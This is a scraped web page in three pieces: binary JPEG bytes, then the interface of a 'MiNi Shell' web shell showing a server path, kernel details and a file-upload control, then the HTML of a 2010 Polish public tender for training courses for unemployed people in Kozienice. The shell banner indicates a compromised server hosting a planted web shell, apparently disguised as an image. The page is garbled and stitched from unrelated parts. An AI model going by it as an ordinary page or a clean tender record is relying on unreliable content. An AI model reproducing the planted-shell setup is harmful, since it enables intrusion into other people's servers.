JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100707/199770-N-2010.html

<p class="kh_header"><b>Kozienice: Zorganizowanie  i przeprowadzenie szkoleń w zakresie:
CZĘŚĆ I - Sprzedawca  z obsługą kas fiskalnych oraz umiejętnością  fakturowania + HACCP  dla 20 osób bezrobotnych 
CZĘŚĆ II -  Kosmetyka, wizaż, stylizacja paznokci  dla  12 osób bezrobotnych 
CZĘŚĆ III -  Pracownik ds. kadrowych i płacowych z obsługą programów użytkowych   dla  17 osób bezrobotnych 
CZĘŚĆ IV -  Podstawy obsługi komputera z fakturowaniem komputerowym dla 18 osób bezrobotnych , finansowanych ze środków Funduszu Pracy</b><br>
<b>Numer ogłoszenia: 199770 - 2010; data zamieszczenia: 07.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Zdziczów 1, 26-900 Kozienice, woj. mazowieckie, tel. 048 6146699, faks 048 6146691.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.kozienice.sisco.info, www.pupkozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie  i przeprowadzenie szkoleń w zakresie:
CZĘŚĆ I - Sprzedawca  z obsługą kas fiskalnych oraz umiejętnością  fakturowania + HACCP  dla 20 osób bezrobotnych 
CZĘŚĆ II -  Kosmetyka, wizaż, stylizacja paznokci  dla  12 osób bezrobotnych 
CZĘŚĆ III -  Pracownik ds. kadrowych i płacowych z obsługą programów użytkowych   dla  17 osób bezrobotnych 
CZĘŚĆ IV -  Podstawy obsługi komputera z fakturowaniem komputerowym dla 18 osób bezrobotnych , finansowanych ze środków Funduszu Pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I. 
Realizacja szkolenia w zakresie:  Sprzedawca z  obsługą kas fiskalnych oraz umiejętnością  fakturowania + HACCP  dla 20 osób bezrobotnych ze środków Funduszu Pracy. Celem szkolenia jest przygotowanie uczestników szkolenia do pracy na stanowisku sprzedawca, nabycie przez nich wiedzy i umiejętności teoretycznych i praktycznych  niezbędnych do obsługi kas fiskalnych, fakturowania komputerowego oraz zapoznanie  z zasadami i funkcjonowaniem systemu HACCP.  Wymagana liczba godzin szkolenia: 130 godzin zegarowych ogółem na jednego uczestnika szkolenia, w tym minimum 95 godzin zegarowych szkolenia praktycznego. Szkolenie powinno obejmować następujące moduły tematyczne: I. Podstawowe zagadnienia z zakresu nowoczesnych technik sprzedaży, II. Podstawy towaroznawstwa, organizacji pracy w sklepie, inwentaryzacji, organizacji   zaopatrzenia, III. Sprzedaż (techniki sprzedaży, dokumentacja sprzedaży i podstawowe obliczenia sklepowe, czynności rachunkowo-kasowe, magazynowanie towarów, profesjonalna obsługa klienta, etyka w zawodzie sprzedawcy),  IV. Szkolenie w zakresie HACCP,  V.  Podstawy obsługi komputera (podstawy obsługi komputera w systemie Windows XP, MS Word, MS Excel, Internet, Microsoft Outlook), VI. Fakturowanie komputerowe,  VII. Obsługa kas fiskalnych,  VIII. Marketing i negocjacje. Przedmiot zamówienia obejmuje także zorganizowanie egzaminu końcowego.
CZĘŚĆ II.
Realizacja  szkolenia  w zakresie: Kosmetyka, wizaż, stylizacja paznokci dla 12 osób bezrobotnych ze środków Funduszu Pracy. Celem szkolenia jest nabycie przez uczestników szkolenia wiedzy oraz umiejętności teoretycznych  i praktycznych z zakresu kosmetyki, wizażu i zdobnictwa paznokci. Wymagana liczba godzin szkolenia:  150 godzin zegarowych ogółem na jednego uczestnika szkolenia, w tym minimum 112 godzin zegarowych szkolenia praktycznego. Szkolenie powinno obejmować następujące moduły  tematyczne:  I.  Kosmetyka-wizaż ( dermatologia, kosmetologia, analiza kolorystyczna, wizaż, techniki przeprowadzania zabiegów pielęgnacyjnych i upiększających, zasady i techniki wykonywania  makijażu dziennego, zasady i techniki wykonywania makijażu wieczorowego, trendy w makijażu),  II. Stylizacja paznokci ( budowa  , modelowanie i pielęgnacja paznokci - manicure, pedicure, przedłużanie i modelowanie paznokci metodą: żelową, akrylową, fiberglass,  uzupełnianie akrylu i żelu, malowanie i zdobienie paznokci, dezynfekcja w gabinecie kosmetycznym). Przedmiot zamówienia obejmuje także zorganizowanie egzaminu końcowego.


CZĘŚĆ III. 
Realizacja  szkolenia  w zakresie  Pracownik ds. kadrowych i płacowych z obsługą programów użytkowych dla 17 osób bezrobotnych ze środków Funduszu Pracy. Celem  szkolenia jest przygotowanie uczestników szkolenia do pracy w charakterze pracownika kadrowo-płacowego i uzyskanie przez nich wiedzy i umiejętności praktycznych  z zakresu kadr, płac i  obsługi programów użytkowych. Wymagana liczba godzin szkolenia: 150 godzin zegarowych ogółem na jednego uczestnika szkolenia, w tym minimum 100 godzin zegarowych szkolenia praktycznego. Szkolenie powinno obejmować następujące moduły  tematyczne: I.  Kadry ( organizacja stanowiska pracy ds. kadrowych, obowiązujące akty prawne, wybrane zagadnienia prawa pracy m.in :zawarcie stosunku pracy, umowy o pracę, zasady rozwiązywania umów o pracę, czas pracy i jego planowanie, urlopy pracownicze, świadczenia dla pracowników, odpowiedzialność prawna w stosunkach pracy,  prowadzenie dokumentacji kadrowej, BHP i ppoż, obsługa  programów kadrowych), II. Płace ( organizacja pracy pracownika ds. płac, podstawy prawne i zasady ustalania wynagrodzeń, finanse, podatki, ubezpieczenia społeczne, rozliczenia z ZUS i US, naliczanie wynagrodzenia za pracę, listy płac,  rozliczanie innych świadczeń  niż wynagrodzenia ze stosunku pracy, zasiłki, rozliczanie funduszu pracy, gwarantowanych świadczeń pracowniczych, III. Komputer (obsługa programów użytkowych: Płatnik ,  Symfonia-moduł Kadry i Płace oraz innych   wybranych programów kadrowo-płacowych). Przedmiot zamówienia obejmuje także zorganizowanie egzaminu końcowego. 

CZĘŚĆ IV. 
Realizacja  szkolenia  w zakresie  Podstawy obsługi komputera z fakturowaniem komputerowym dla 18 osób bezrobotnych ze środków Funduszu Pracy. Celem  szkolenia jest  nabycie przez uczestników szkolenia wiedzy i umiejętności związanych z podstawową obsługą komputera, elementarnych programów komputerowych, fakturowaniem komputerowym oraz podniesienie wiedzy ogólnej uczestników kursu.  Wymagana liczba godzin szkolenia: 80 godzin zegarowych ogółem na jednego uczestnika szkolenia, w tym minimum 64 godziny zegarowych szkolenia praktycznego. Szkolenie powinno obejmować następujące zagadnienia: Podstawy działania komputera i jego obsługi- wprowadzenie do Windows XP, System operacyjny MS Windows XP   (składniki systemu, struktura folderów i plików, poruszanie się po systemie), Klasyfikacja    i przegląd programów komputerowych (systemy operacyjne, programy biurowe, programy użytkowe), Praca z edytorem tekstu Microsoft Word, Praca z arkuszem kalkulacyjnym Microsoft  Excel, Praca z programem prezentacyjnym Microsoft PowerPoint, Internet  i poczta  elektroniczna  (Microsoft Outlook i Outlook Express), Oprogramowanie zabezpieczające komputer- instalowanie, aktualizacja, Multimedia ( CD, DVD, MP3, PenDrive itp.), Fakturowanie  komputerowe  (zapoznanie z  zasadami  i operacjami fakturowania oraz programami  do fakturowania). Przedmiot zamówienia obejmuje także zorganizowanie egzaminu końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za Wykonawcę, który posiada uprawnienia do wykonywania będącej przedmiotem zamówienia działalności, Zamawiający uzna Wykonawcę, który posiada wpis do rejestru instytucji szkoleniowych, prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej uaktualniony na rok 2010 / - wymóg art. 20 ust. 1 i 7 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia   i instytucjach rynku pracy /tekst jednolity - Dz. U. Nr 69 z 2008r. poz.415 z późń. zm./ oraz § 4.1. pkt  2  rozporządzenia Ministra Gospodarki i Pracy  z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych (Dz. U. z 2004r. Nr 236 poz. 2365).
Ocena spełnienia tego warunku nastąpi na podstawie wymaganego  oświadczenia na zasadzie spełnia lub nie spełnia  wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za Wykonawcę, który posiada niezbędną wiedzę i doświadczenie Zamawiający uzna Wykonawcę, który wykonał w sposób należyty, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
dla części I:   co najmniej 1 szkolenie  grupowe o wartości nie mniejszej niż 15.000 zł  w jednym z niżej podanych  zakresów:
-  Sprzedawca z obsługą kas fiskalnych oraz umiejętnością fakturowania + HACCP;
-  Sprzedawca z obsługą kas fiskalnych;
-  Sprzedawca - handlowiec  z obsługą kas fiskalnych oraz umiejętnością fakturowania + HACCP
dla części II:  co najmniej 1 szkolenie grupowe o wartości nie mniejszej niż 15.000 zł   w jednym z niżej podanych  zakresów:
- kosmetyka , wizaż, stylizacja paznokci;
- kurs kosmetyczny z elementami wizażu i stylizacji paznokci;
- kosmetyczka z elementami stylizacji paznokci i wizażu;
dla części III:  co najmniej 1 szkolenie grupowe  o wartości nie mniejszej niż 12.000 zł   w jednym z niżej podanych  zakresów:
- Pracownik ds. kadrowych i płacowych z obsługą programów użytkowych;
- Specjalista ds. kadr i płac;
- Kurs dla pracowników ds. kadr i płac z obsługą programu Płatnik i Symfonia- Kadry   i Płace;
- Pracownik ds. płacowych i kadrowych;
- Kurs kadrowo-płacowy od podstaw.
dla części IV:  co najmniej 1 szkolenie grupowe o wartości nie mniejszej niż 10.000 zł    w jednym z niżej podanych  zakresów:
- Podstawy obsługi komputera z fakturowaniem komputerowym;
- Obsługa komputera;
- Podstawy obsługi komputera;
- Kurs obsługi komputera od podstaw
Należy uwzględnić wyłącznie szkolenia grupowe. Szkolenia w ramach indywidualnego naboru nie będą uwzględniane przez Zamawiającego.
Ocena spełnienia tego warunku nastąpi na podstawie wykazu przeprowadzonych szkoleń oraz referencji potwierdzających należyte wykonania tychże szkoleń na zasadzie spełnia lub nie spełnia wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za Wykonawcę, który dysponuje potencjałem technicznym Zamawiający uzna Wykonawcę, który dysponuje: 
dla części I: 
do realizacji części teoretycznej: salą szkoleniową dla minimum 20 uczestników szkolenia wyposażoną w pomoce    i środki dydaktyczne niezbędne do przeprowadzenia szkolenia ( m.in. projektor multimedialny, laptop, ekran  ręczny lub tablicę naścienną  lub flipchart),
 do realizacji części praktycznej szkolenia:  salą szkoleniową dla minimum 20 uczestników szkolenia, wyposażoną w co najmniej 20 stanowisk komputerowych z niezbędnym do przeprowadzenia szkolenia   oprogramowaniem komputerowym, w co najmniej 10 kas fiskalnych oraz wyposażoną w inne  urządzenia i narzędzia dydaktyczne niezbędne dla każdego uczestnika szkolenia praktycznego będącego przedmiotem zamówienia.
dla części II:
do realizacji części teoretycznej i praktycznej: salą szkoleniową  dla minimum 12  uczestników   szkolenia , wyposażoną w urządzenia , narzędzia, , materiały dydaktyczne niezbędne do wykonania  przedmiotowego zamówienia
dla części III:
do realizacji części teoretycznej: salą szkoleniową dla minimum 17 uczestników szkolenia wyposażoną  w pomoce   i środki dydaktyczne niezbędne do przeprowadzenia szkolenia ( m.in. projektor multimedialny, laptop, ekran    ręczny lub tablicę naścienną  lub flipchart),
 do realizacji części praktycznej szkolenia:  salą szkoleniową dla minimum 17 uczestników szkolenia, wyposażoną  w co najmniej 17 stanowisk komputerowych z niezbędnym do przeprowadzenia szkolenia oprogramowaniem  komputerowym.

dla części IV:
do realizacji części teoretycznej: salą szkoleniową dla minimum 18 uczestników szkolenia wyposażoną w pomoce    i środki dydaktyczne niezbędne do przeprowadzenia szkolenia ( m.in. projektor multimedialny, laptop, ekran    ręczny lub tablicę naścienną  lub flipchart),
do realizacji części praktycznej szkolenia:  salą szkoleniową dla minimum 18 uczestników szkolenia, wyposażoną   w co najmniej 18 stanowisk komputerowych z niezbędnym do przeprowadzenia szkolenia oprogramowaniem  komputerowym.

Ocena spełnienia tego warunku nastąpi na podstawie wykazu na zasadzie spełnia lub nie spełnia wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za Wykonawcę, który dysponuje osobami zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawcę, który dysponuje co najmniej: 

dla części I: 1 wykładowcą z wykształceniem wyższym ekonomicznym ( kierunek: marketing) na potrzeby realizacji Modułu I, II, III i VIII szkolenia,
1 wykładowcą na potrzeby realizacji Modułu IV szkolenia , posiadającym wyższe wykształcenie  oraz doświadczenie w przeprowadzeniu minimum 3 szkoleń grupowych  z zakresu HACCP,
1 wykładowcą na potrzeby realizacji Modułu V szkolenia, posiadającym wykształcenie wyższe  informatyczne oraz doświadczenie w przeprowadzeniu minimum 3 szkoleń grupowych z zakresu podstaw obsługi komputera lub ECDL,
1 wykładowcą na potrzeby realizacji Modułu VI szkolenia, posiadającym co najmniej wykształcenie średnie ekonomiczne oraz umiejętności praktyczne w fakturowaniu komputerowym,
1 wykładowcą na potrzeby realizacji Modułu VII szkolenia, , posiadającym wykształcenie co najmniej  średnie oraz doświadczenie w przeprowadzeniu minimum 3 szkoleń grupowych z zakresu obsługi kas fiskalnych.

dla części II:
1 wykładowcą do zajęć teoretycznych oraz praktycznych, posiadającym łącznie minimum średnie     wykształcenie kosmetyczne, minimum 5-letni staż w zawodzie kosmetyczki oraz ukończony kurs pedagogiczny.  Wykształcenie i doświadczenie zawodowe Wykładowcy powinno być potwierdzone świadectwami, dyplomami, 
certyfikatami, dyplomami czeladniczymi lub mistrzowskimi.

dla części III:
1 wykładowcą posiadającym wykształcenie wyższe  w zakresie nauk ekonomicznych oraz doświadczenie w przeprowadzeniu minimum 1 szkolenia grupowego w zakresie objętym przedmiotem zamówienia, czyli z zakresu kadr i płac 
1 wykładowcą posiadającym wykształcenie wyższe  prawnicze oraz doświadczenie    w przeprowadzeniu minimum 1 podobnego pod względem zawartości merytorycznej szkolenia grupowego  z zakresu prawa pracy 
1 wykładowcą posiadającym wykształcenie wyższe  informatyczne oraz doświadczenie w przeprowadzeniu minimum 1 szkolenia grupowego z zakresu  obsługi komputerowych programów użytkowych w zakresie objętym przedmiotem zamówienia, czyli z zakresu obsługi programów:  Płatnik oraz Symfonia-moduł Kadry i Płace

dla części IV:
1 wykładowcą posiadającym wykształcenie wyższe informatyczne oraz doświadczenie w przeprowadzeniu minimum 1 szkolenia grupowego w zakresie objętym przedmiotem zamówienia, czyli z zakresu  podstaw obsługi komputera lub posiadającym minimum roczne doświadczenie w nauczaniu danego przedmiotu   w szkole prowadząc zajęcia o tematyce związanej z przedmiotem zamówienia, czyli   z zakresu  podstaw obsługi komputera jako nauczyciel/wykładowca.
1 wykładowcą  posiadającym co najmniej wykształcenie średnie ekonomiczne oraz umiejętności praktyczne w fakturowaniu komputerowym.
Ocena spełnienia tego warunku nastąpi na podstawie złożonych  dokumentów  (wykazu) i oświadczeń  na zasadzie spełnia lub nie spełnia  wymaganych warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. szczegółowy program szkoleń zgodny z wymogami z SIWZ
2. pełnomocnictwo do reprezentowania wykonawcy w postępowaniach o udzielenie zamówienia publicznego w tym do podpisywania oferty i pozostałych dokumentów przetargowych, jeżeli osoba dokonująca tych czynności nie jest wykazana  w dokumencie rejestracyjnym (ewidencyjnym) lub z umowy łączącej podmioty.
2. oświadczenie, że wykonawca posiada wpis do rejestru instytucji szkoleniowych
3. zobowiązanie innych podmiotów do udostępnienia Wykonawcy niezbędnych do wykonania zamówienia narzędzi i urządzeń, na potrzeby realizacji przedmiotowego zamówienia, jeżeli dotyczy.
4. zobowiązanie  innych podmiotów do udostępnienia Wykonawcy osób zdolnych do wykonania przedmiotowego zamówienia, jeżeli dotyczy.
5. zobowiązanie innych podmiotów do udostępnienia Wykonawcy wiedzy   i doświadczenia ze wskazaniem w jakim zakresie będzie brał udział w wykonywaniu zamówienia , jeżeli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
